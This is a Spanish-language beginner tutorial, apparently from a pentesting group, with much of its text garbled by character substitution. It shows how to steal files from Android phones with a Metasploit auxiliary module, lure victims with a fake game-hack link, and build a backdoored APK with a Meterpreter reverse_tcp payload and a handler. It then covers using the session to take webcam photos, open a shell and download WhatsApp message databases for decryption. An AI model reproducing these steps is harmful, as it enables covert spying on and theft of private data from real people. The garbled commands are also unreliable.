Está en la página 1de 9

PENTEST & Support

Gathering en Android y Backdoor [Con Metasploit]


Por J0K3$/Icebreaker
Nivel de Paper = Bsico
Gathering: Robo de Archivo en Android [etas!"oit#
Hola!
En esta parte del paper explicaremos como conseguir informacin del Android,
primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno
una ve cargado usaremos el siguiente !Auxiliar" #
$se a$%i"iar&/gather/android'ht(")i"e!rovider
$a vieron una ve cargado , pueden %acer un !s%ow options" , si &uieren , bueno
a%ora lo &ue tenemos &ue %acer es indicarles el arc%ivo a robar de android, para eso
os de'o ac( una lista de los pat% de los directorios , para mi , interesantes)))))
*ueno en mi cas no coger+ ninguna de esas coger+, otras pues usare mi ma&uina
virtual para , &ue no me demore muc%o tiempo , pero pueden usar una de esas, por si
les interesa alg,n directorio en especial , -./! Empecemos ac( les de'o una foto de
mi configuracin 0 a%ora les explicare punto por punto para &ue es cada)
*ueno, expli&uemos esto por partes))))
*i"es = Est+ sera el arc%ivo &ue robaran de android, me explico/ El pat% 1))en mi
caso ser( %osts)
+RIPA,-= 2e colo&u+ este !/" es lo &ue ira detr(s de la ip, pueden poner algo as3
para la ing social, por e'emplo /Hac.Pou )))por e'emplo ese supuesto %ac. para el
'uego 0 saldria as3 # !4p"/Hac.Pou
.R/P0R,= Al principio saldr3a 5656 pero para no darle el puerto ese pues la
direccin &uedar3a as3 al entreg(rsela a la v3ctima !ip"#5656/Hac.Pou , pues les
extra7ar3a aun&ue tambi+n %a0 s%orten , pero lo podr3an ver en la barrita de arriba al
e'ecutarlo)))Entonces d+'enlo como 56 0 no se visualiara 8Por&ue es protocolo
H99P:))))
*ueno le daremos la direccin &ue nos da para los ata&ues locales la de 2ocal 4p ,
osease le dar+ esa ip %aber &ue me muestra el exploit ;-! )

*ueno, ac( ven eso es la ip local , de el dispositivo atacado , 0 su versin de android
< modelo del dispositivo =No est( mal / E% )))*ueno este ata&ue es mu0 bueno , con
una combinacin &ue dir+ al final 1)) Pero pas+monos a la otra parte del paper no/
1)=9ienen miedo/
Backdoor en Android1 ,o(ando e" 2ontro" de" dis!ositivo1
[etas!"oit#
*ueno en est+ punto dir(n ! =Enserio/ >e puede penetrar mi android, de una forma
sencilla)))salt(ndose antivirus 1))Pues si, primero actualicen metasploit si llevan
tiempo sin %acerlo , pues salieron algunos mdulos nuevos bueno , pasemos a la
accin primero dentro de la consola de metasploit colocaremos esto 1)
search android
*ueno ver(n los siguientes mdulos)))))
- s3! Am sacado un exploit %andler, 0 ? pa0loads)))mmm)))) sa&uemos un AP@
infectada =No/ Alaro))))bueno como creamos este ap./ Pues f(cil con msfpa0load ,
0o lo creare de Beterpreter, por si no lo saben meterpreter es el !9ro0ano" de
metasploit ,con funciones interesantes) Para crearlo abrimos una terminal 0 ponemos
lo siguiente)))))
s$do (s)!a&"oad !a&"oad/android/(eter!reter/reverse'tc! 3-0.,45I! "oca" o
6%terna5 R 7 8R$ta9Archivo1a!k5
6:e(!"o:
s$do (s)!a&"oad !a&"oad/android/(eter!reter/reverse'tc!
3-0.,4;<=1;>?1;13@ R 7 /ho(e/icebreaker/6scritorio/-ackPo$1a!k
*ueno , dir(n si %an %ec%o !bac.doors" para metasploit , ! C6.DE C6.DE ! , por &u+
pones !F" si siempre creamos el e'ecutable con !G" , tenemos &ue decirle a
msfpa0load &ue use la salida FAH) Eso en otros pa0loads nos sacar3a el s%ellcode sin
formato, pero en el caso de Android nos sacara un ap.! , 'e'e' bien =no/ Pueden
comprobarlo con el comando !file nombre)ap." 0 les saldr( la info todo bien
escrito))))*ueno una ve %ec%o eso, cargamos el exploit 1)))
s$do (s)c"i e%!"oit/($"ti/hand"er PAA30AB4android/(eter!reter/reverse'tc!
3-0.,45.$ i! !$esta en e" backdoor5 6
e:e(!"o:
s$do (s)c"i e%!"oit/($"ti/hand"er PAA30AB4android/(eter!reter/reverse'tc!
3-0.,45.$ i! !$esta en e" backdoor5 6
*ueno a%ora la victima cuando se instale la Ap., infectada nos saldr( esto))))
- s3! 9enemos la sesin ese android es nuestro! , a%ora podemos , poner Help , para
ver los comandos &ue nos brinda Beterpreter ,para est+ dispositivo)
Io! cuantos comandos! Probemos alguno como )))">0sinfo")))))
Bmmm ! *uena informacin , probemos 1)HebcamJ>nap))))Est+ es para ec%ar una
foto con el tel+fono infectado)))))

No s+ ve mu0 bien xK 'a'a' pero bueno, es la c(mara de mi mvil)))GK 'a'a'a'a' , 0
como vieron antes 'a'a'a no es mu0 bueno ni nuevo)))GK 'a'a''a))))*ueno probemos
s%ell))))Est+ es mi comando preferido))))
- s3! , &ue bonitos directorios del android infectado 1))bueno entremos en sdcard
%aber &ue encontramos))))
-%! %emos encontrado el directorio de H%atsApp)))))>algamos 0 movamos con
meterpreter %acia este directorio para descargarnos algo))))
*ueno bueno, les explico lo &ue uso en la imag+n para moverme))))son estos ?
comandos)))
!Cd = Es para ver en &ue directorio empeamos inicialmente))))
cd = para avanar o retroceder 8Parar retroceder ser3a as3 #" cd )) !:
entramos en alguna carpeta como podria ser Katabases, 0 descargamos el arc%ivo de
la database llamado # !(sgstore1db1cr&!t" , bueno ese arc%ivo tiene las
conversaciones de w%atsapp tambi+n podr3an descargar im(genes)))etc de todo ,
despu+s de descargarlo usen algo como un w%atsapp decripter 0 desencripten las
conversaciones para leerlas)))0a are un paper de como se %acen 1)
.a"$dos & D$e "es a"" servido de a"go1
;racias a Pentest And >upport , especialmente gracias a Bavid +riEsteg$i1

También podría gustarte